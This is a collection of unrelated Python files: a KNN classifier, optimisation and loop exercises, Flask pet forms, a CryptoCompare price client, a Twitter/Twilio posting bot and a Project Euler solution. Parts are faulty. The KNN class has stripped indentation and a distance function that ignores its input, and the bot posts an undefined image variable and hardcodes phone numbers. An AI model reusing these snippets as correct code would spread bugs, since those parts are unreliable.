5b9d77b28969482a609423ab53f56d52aea86f32 | Python | ljt270864457/algorithm | /knn/KNN/knn.py | UTF-8 | 2,759 | 3.34375 | 3 | [] | no_license | # coding: utf-8
from __future__ import division
import pandas as pd
from collections import Counter
class Preprossing(object):
    """Load, clean and split the ionosphere CSV data set.

    NOTE(review): the class name is a misspelling of "Preprocessing"; it is
    kept as-is because callers reference it by this name.
    """
    def __init__(self, data_path, train_percent):
        print 'data preprossing...'
        self.data_path = data_path
        self.train_percent = train_percent

    def readData(self):
        """Read the raw CSV (no header row) into a DataFrame."""
        return pd.read_csv(self.data_path, header=None, sep=',')

    def cleanData(self, df):
        '''
        Map the label column: 'g' -> 1, 'b' -> 0.
        Min-max scale every feature column into [0, 1]; constant columns are
        left unchanged to avoid division by zero.
        '''
        df.iloc[:, -1] = df.iloc[:, -1].apply(lambda x: 1 if x == 'g' else 0)
        df.iloc[:, :-1] = df.iloc[:, :-1].apply(lambda x: (x - x.min()) / (x.max() -
                                                                           x.min()) if x.max() != x.min() else x)
        return df

    def splitData(self, df):
        """Split into train/test features and labels by row order at train_percent."""
        train_rows_count = int(df.shape[0] * self.train_percent)
        train_x = df.iloc[:train_rows_count, :-1]
        train_y = df.iloc[:train_rows_count, -1]
        test_x = df.iloc[train_rows_count:, :-1]
        test_y = df.iloc[train_rows_count:, -1]
        return train_x, test_x, train_y, test_y
class KNN(object):
def __init__(self, train_x, train_y, test_x, test_y, K=3):
self.train_x = train_x
self.train_y = train_y
self.test_x = test_x
self.test_y = test_y
self.K = K
self.train_rows = self.train_x.shape[0]
self.test_rows = self.test_x.shape[0]
def fit(self):
'''
使用欧氏距离进行计算,返回排序之后的距离
'''
print 'fiting ......'
result_list = []
for i, row in self.test_x.iterrows():
self.train_x['distance'] = self.train_x.apply(
lambda x: (sum((row - self.test_x.loc[i]) ** 2) ** 0.5), axis=1)
top_K = self.train_x.sort_values(['distance']).iloc[:self.K, ]
tags = list(self.train_y[list(top_K.index)])
result_tag = Counter(tags).most_common(1)
result_list.append(result_tag[0][0])
result_dataFrame = pd.DataFrame({'actual': list(self.test_y), 'predict': result_list})
return result_dataFrame
def validate(self, df):
new_df = df[df['actual'] == df['predict']]
correct_count = new_df.shape[0]
accuracy = (correct_count / self.test_rows) * 100
print 'accuracy percent is {0}%'.format(round(accuracy, 2))
if __name__ == '__main__':
    # End-to-end demo: load the ionosphere dataset, normalise it, hold out
    # 30% of the rows for testing, then fit and score the KNN classifier.
    # NOTE(review): expects './ionosphere.data' to exist next to this script.
    data_reader = Preprossing('./ionosphere.data', 0.7)
    data = data_reader.readData()
    cleanedData = data_reader.cleanData(data)
    train_x, test_x, train_y, test_y = data_reader.splitData(cleanedData)
    knn = KNN(train_x, train_y, test_x, test_y)
    df = knn.fit()
    # Show per-row actual vs predicted labels, then the overall accuracy.
    print df
    knn.validate(df)
| true |
79d8ef2399a49d68d5c304abcfe9b04479be2af2 | Python | zycode1561/PythonLearning | /include/ML/wu_exe/commons/test1.py | UTF-8 | 467 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
__author__ = 'Zy_Code'
# coding=utf-8
from scipy.optimize import minimize
import numpy as np
# demo 1
# 计算 1/x+x 的最小值
def fun(args):
    """Build the objective f(x) = args / x[0] + x[0] for scipy.optimize.

    `args` is the numerator coefficient; the returned callable takes a
    1-D point and evaluates the objective at its first component.
    """
    coefficient = args

    def objective(x):
        return coefficient / x[0] + x[0]

    return objective
if __name__ == "__main__":
    # Demo: minimise f(x) = 1/x + x starting from x = 2 (minimum at x = 1).
    coefficient = (1)  # a
    initial_guess = np.asarray((2))  # initial guess
    solution = minimize(fun(coefficient), initial_guess, method='SLSQP')
    print(solution.fun)
    print(solution.success)
    print(solution.x)
35a7e83d1ea768e32abe7c31fde7baaab4cf60ac | Python | subreena10/loop | /s2q5meraki.py | UTF-8 | 105 | 3.5625 | 4 | [] | no_license |
# Prompt the user for six numbers, accumulating their running total.
i=1
sum=0
while i<=6:
    n=int(input("Enter a number:- "))
    sum=sum+n
    # Prints the running total after every entry.
    # NOTE(review): if only the final total is wanted, this print belongs
    # after the loop — confirm intent.
    print(sum)
    i+=1
| true |
46e1400019d78496039c74995776875181077bc4 | Python | finddeniseonline/sea-c34-python.old | /students/MichaelHazani/session05/test_arguments.py | UTF-8 | 200 | 2.625 | 3 | [] | no_license | import arguments
localx = arguments.x
def test_tupleexperiment():
"""test method tupleexperiment in the arguemnts.py module"""
assert(arguments.tupleexperiment(localx) == (4, 3, 4, 5, 6))
| true |
b730a8c31fac5e5a861ebfb0770fe15641c3f5f4 | Python | OrangeHoodie240/SB_24_1_15 | /forms.py | UTF-8 | 1,311 | 3.078125 | 3 | [] | no_license | from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField, BooleanField, SelectField, RadioField
from wtforms.validators import InputRequired, AnyOf, URL, Optional, NumberRange
valid_pets = ['cat', 'dog', 'porcupine']
class PetForm(FlaskForm):
""" Form for adding new pet """
name = StringField("Name: ", validators=[InputRequired(message="Pet Name Required")])
species = SelectField("Species: ", choices=valid_pets, validators=[InputRequired(message="Pet Species Required"), AnyOf(valid_pets)])
photo_url = StringField("Photo Url: ", validators=[Optional(), URL(message='Not valid url')])
notes = StringField("Notes :")
age = IntegerField("Age: ", validators=[NumberRange(min=0, max=30), Optional()])
class EditForm(FlaskForm):
    """ Form for editing pet.

    Only the mutable attributes are exposed: photo URL, notes and
    adoption availability.
    """
    photo_url = StringField("Photo Url: ", validators=[Optional(), URL()])
    notes = StringField("Notes :")
    available = RadioField("Available: ", choices=[(True, 'yes'), (False, 'no')])

    @classmethod
    def fill_pet(cls, form, pet):
        """ Copy submitted form data onto the given pet object. """
        # Fix: removed a leftover debug print of form.available.data.
        pet.notes = form.notes.data
        # RadioField posts its choice back as a string ("True"/"False"),
        # so the truthy option is recognised by its leading 'T'.
        pet.available = True if form.available.data.startswith('T') else False
        pet.photo_url = form.photo_url.data
e2cc70ad11335d8ea043214eed38e220748b0307 | Python | mcelhennyi/CryptoTaxBot | /FairMarketValue/cryptocompare_interface.py | UTF-8 | 8,423 | 2.90625 | 3 | [
"MIT"
] | permissive | from FairMarketValue import FairMarketValue
from FairMarketValue.fmv_buffer import FmvBuffer
import http.client
import json
import time
import datetime
class CryptoCompareInterface(FairMarketValue):
    """Fair-market-value source backed by CryptoCompare's day-average API.

    USD day averages are memoised per (symbol, date) in an FmvBuffer so
    repeated queries for the same calendar day avoid extra HTTP requests.
    """

    def __init__(self):
        FairMarketValue.__init__(self, None, None)
        # Cache of USD day averages keyed by symbol + calendar date.
        self._buf = FmvBuffer()

    def get_average_usd_price_of_btc(self, epoch_millis):
        """USD day-average BTC price for the day containing epoch_millis."""
        # Delegate to the generic lookup (the original duplicated it inline).
        return self.get_average_usd_price_of_('btc', epoch_millis)

    def get_average_usd_price_of_bnb(self, epoch_millis):
        """USD day-average BNB price for the day containing epoch_millis."""
        return self.get_average_usd_price_of_('bnb', epoch_millis)

    def get_average_usd_price_of_(self, symbol, epoch_millis):
        """USD day-average price of `symbol`, served from the buffer when possible."""
        date_string = self._get_date_string(epoch_millis)
        ret_avg = self._buf.get_average(symbol, date_string)
        if ret_avg is not None:
            return ret_avg
        avg = float(self._request_day_average(epoch_seconds=epoch_millis / 1000,
                                              from_sym=symbol, to_sym='usd')['USD'])
        # buffer_average is expected to return True on success.
        # NOTE(review): asserts vanish under `python -O`; confirm a silent
        # cache miss is acceptable in that mode.
        assert self._buf.buffer_average(symbol, date_string, avg)
        return avg

    def get_average_btc_price_of_(self, symbol, epoch_millis):
        """BTC day-average price of `symbol`.

        WARNING: not buffered, because FmvBuffer assumes USD quotes.
        """
        return float(self._request_day_average(epoch_seconds=epoch_millis / 1000,
                                               from_sym=symbol, to_sym='btc')['BTC'])

    def _request_day_average(self, epoch_seconds, from_sym, to_sym='BTC'):
        """GET /data/dayAvg for from_sym -> to_sym at epoch_seconds.

        Returns the parsed JSON body; raises Exception on any non-200 status.
        """
        # e.g. https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&toTs=1517460356
        connection = http.client.HTTPSConnection('min-api.cryptocompare.com', timeout=2)
        try:
            connection.request('GET', '/data/dayAvg?fsym=' + str(from_sym).upper() +
                               '&tsym=' + to_sym.upper() +
                               '&toTs=' + str(int(epoch_seconds)) +
                               '&extraParams=CryptoTaxBot')
            response = connection.getresponse()
            # Fix: the original used `is not 200` (identity, not equality),
            # which only works because CPython caches small ints.
            if response.status != 200:
                raise Exception("Request not good: " + str(response.status))
            return json.loads(response.read().decode('utf-8'))
        finally:
            # Fix: the original never closed the connection.
            connection.close()

    def _get_date_string(self, epoch_millis):
        """Local calendar date (YYYY-MM-DD) for a millisecond timestamp."""
        return datetime.datetime.fromtimestamp(epoch_millis / 1000).strftime('%Y-%m-%d')
if __name__ == "__main__":
    # Ad-hoc smoke test: fetch the current BTC/USD day average and print it.
    # Performs a live HTTPS request to min-api.cryptocompare.com.
    cci = CryptoCompareInterface()
    timenow = time.time()
    time_then = timenow #- (86400/3)
    print("then: " + str(time_then) + ", time now: " + str(timenow))
    data = cci._request_day_average(time_then, 'BTC', to_sym="usd")
    # for i in data:
    print(data)
    # print(time.strftime('%Y-%m-%d', time.gmtime(i['time'])))
    print('\n')
"""
Day Avg Documentation:
https://min-api.cryptocompare.com/
"DayAvg": {
"Simple": "https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&extraParams=your_app_name",
"Info": {
"Description": "Get day average price. The values are based on hourly vwap data and the average can be calculated in different waysIt uses BTC conversion if data is not available because the coin is not trading in the specified currency. If tryConversion is set to false it will give you the direct data. If no toTS is given it will automatically do the current day. Also for different timezones use the UTCHourDiff paramThe calculation types are: VWAP - a VWAP of the hourly close price,MidHighLow - the average between the 24 H high and low.VolFVolT - the total volume from / the total volume to (only avilable with tryConversion set to false so only for direct trades but the value should be the most accurate average day price) ",
"Parameters": [
{
"name": "tryConversion",
"type": "bool",
"required": false,
"defaultVal": true,
"info": "If set to false, it will try to get values without using any conversion at all"
},
{
"name": "fsym",
"type": "string",
"required": true,
"minLen": 1,
"maxLen": 10,
"transform": "Uppercase",
"extraValidation": "KeyInGlobalInfo"
},
{
"name": "tsym",
"type": "string",
"required": true,
"minLen": 1,
"maxLen": 10,
"transform": "Uppercase",
"extraValidation": "KeyInTradePairsOrConversionSymbolTradePairs",
"baseKey": "fsym"
},
{
"name": "e",
"type": "string",
"required": false,
"defaultVal": "CCCAGG",
"minLen": 2,
"maxLen": 30,
"extraValidation": "MarketInPairMarketList"
},
{
"name": "avgType",
"type": "string",
"required": false,
"defaultVal": "HourVWAP",
"minLen": 2,
"maxLen": 30,
"extraValidation": "AverageType"
},
{
"name": "UTCHourDiff",
"type": "int",
"required": false,
"defaultVal": 0,
"minValue": -12,
"maxValue": 14,
"info": "By deafult it does UTC, if you want a different time zone just pass the hour difference. For PST you would pass -8 for example."
},
{
"name": "toTs",
"type": "timestamp",
"required": false,
"extraValidation": "DayAvgTimestampValidation",
"secondsInUnit": 3600,
"cacheLength": 610,
"maxUnits": 2000,
"unit": "hour"
},
{
"name": "extraParams",
"type": "string",
"required": false,
"defaultVal": "NotAvailable",
"minLen": 1,
"maxLen": 50
},
{
"name": "sign",
"type": "bool",
"required": false,
"defaultVal": false,
"info": "If set to true, the server will sign the requests."
}
],
"Examples": [
"https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&UTCHourDiff=-8&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=MidHighLow&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=MidHighLow&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=VolFVolT&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&toTs=1487116800&e=Bitfinex&extraParams=your_app_name"
],
"CacheDuration": "610 seconds",
"RateLimit": {
"Hour": 8000,
"Minute": 300,
"Second": 15
}
}
},
""" | true |
dab3694632cbac90427dba4f568b8c1b37f41f88 | Python | debv/digitalwastebot | /dwbot.py | UTF-8 | 2,278 | 2.640625 | 3 | [] | no_license | import sys
import os
import twitter
import time
import random
from twilio.rest import TwilioRestClient
from keys import *
def main():
api = twitter.Api(
consumer_key,
consumer_secret,
access_key,
access_secret
)
client = TwilioRestClient(twil_sid, twil_auth)
tweet = 1
tweetedQuotes = 0
imagesPath = os.listdir('./images')
# Put quotes into list for random tweeting
f = open('quotes/all.txt', 'r')
quotes = f.readlines()
f.close
# Put images into list for random tweeting
images = []
for image in imagesPath:
if(image != '.DS_Store'):
images.append('images/'+image)
# Keep tweeting while there are things to tweet
startTime = time.time()
while(len(quotes) > 0):
# Tweet one image for every 10 quotes
if(tweetedQuotes < 10 and quotes is not None):
if(len(quotes) == 1):
tweet = quotes[0]
elif(len(quotes) < 1):
continue
elif(len(quotes) > 1):
tweet = random.choice(quotes)
tweetIndex = quotes.index(tweet)
api.PostUpdate(tweet)
print("QUOTE")
print(len(quotes))
print(tweetIndex)
del quotes[tweetIndex]
tweetedQuotes += 1
elif((tweetedQuotes >= 10 and images is not None) or (quotes is None)):
tweet = random.choice(images)
tweetIndex = images.index(tweet)
api.PostUpdate('',image)
print("IMAGE")
print(len(images))
print(tweetIndex)
del images[tweetIndex]
tweetedQuotes = 0
# Text me if there are 5 images or quotes remaining
if(len(quotes) == 5 or len(images) == 5):
stats = ("DigitalWasteBot is running low on content!\n"
+ str(5)
+ " Quotes Remaining\n"
+ str(6)
+ " Images Remaining")
message = client.messages.create(body=stats,
to="+13059679060",
from_="+17866614259")
time.sleep(21600.0 - ((time.time() - startTime) % 21600.0)) # Every 6 hours
if __name__ == '__main__':
main()
| true |
52631c46b88c0f89622cad05796888ec7e256ff3 | Python | Letoile/project-euler | /problem-21.py | UTF-8 | 1,931 | 4.28125 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Amicable numbers
Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and each of a and b are called amicable
numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284.
The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
---------------------
Дружественные числа
Пусть d(n) определяется как сумма делителей n (числа меньше n, делящие n нацело).
Если d(a) = b и d(b) = a, где a ≠ b, то a и b называются дружественной парой, а каждое из чисел a и b - дружественным
числом.
Например, делителями числа 220 являются 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 и 110, поэтому d(220) = 284. Делители 284 -
1, 2, 4, 71, 142, поэтому d(284) = 220.
Подсчитайте сумму всех дружественных чисел меньше 10000.
"""
def main():
    """Print the sum of all amicable numbers below 10000 (and the numbers
    themselves), and return that sum.

    An amicable pair (a, b) satisfies d(a) = b, d(b) = a, a != b, where
    d(n) is the sum of the proper divisors of n.
    """
    BIG_NUMBER = 10000

    # Sieve of proper-divisor sums: every d is a proper divisor of each of
    # its multiples 2d, 3d, ...  This is O(n log n), replacing the
    # original's O(n^2) per-number trial division.
    divisors_sum = [0] * BIG_NUMBER
    for d in range(1, BIG_NUMBER // 2 + 1):
        for multiple in range(2 * d, BIG_NUMBER, d):
            divisors_sum[multiple] += d

    amicables = []
    amicables_sum = 0
    seen = set()
    for a in range(2, BIG_NUMBER):
        if a in seen:
            continue
        b = divisors_sum[a]
        # Amicable pair check.  Fix: the original's bound `sum <=
        # len(divisors_sum)` was off by one and could raise IndexError;
        # the strict `b < BIG_NUMBER` guard keeps both members in range.
        if b != a and b < BIG_NUMBER and divisors_sum[b] == a:
            amicables_sum += a + b
            amicables.extend([b, a])
            seen.update((a, b))

    print(amicables_sum)
    print(amicables)
    return amicables_sum


if __name__ == "__main__":
    main()